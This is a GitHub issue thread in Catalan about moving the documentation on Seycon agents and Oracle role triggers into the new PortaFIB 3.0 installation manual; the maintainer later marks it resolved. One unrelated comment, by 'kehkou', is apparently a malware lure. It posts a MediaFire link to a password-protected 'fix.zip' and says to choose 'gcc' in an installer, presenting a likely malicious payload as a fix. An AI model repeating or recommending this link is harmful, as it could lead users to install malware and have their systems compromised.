### ISSUE TITLE
Afegir a manual de Instal·lació de PortaFIB 3.0  el tema dels Agents Seycon

### ISSUE THREAD

**Issue by anadal-fundaciobit** [GovernIB/portafib#869]
El punt 6.5.- Gestió de Rols a traves de triggers Oracle que apareix al l'antic manual de instal3lació ( portafib-3.0\doc\obsolet\Manual_de_Instalacio_de_PortaFIB.odt) s'ha d'afegir a al nou manual de instal3lació de POrtaFIB (portafib-3.0\doc\(CAT) Manual Instal.lació PortaFIB.odt)

Revisar també si encara existeixen els scripts d'Agents Seycon i també si les URL són vàlides (recordar el canvia de context de portafib a portafiback)

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by anadal-fundaciobit** [comment]
Ja hi és al nou manual !!!!!
Fer un diagrama per a que s'entengui milor ...

**Comment by anadal-fundaciobit** [comment]
![Agents Seycon](https://github.com/user-attachments/assets/3654b07c-82a5-4c16-94c2-f6d921a2f86c)

**Comment by anadal-fundaciobit** [comment]
Solucionat
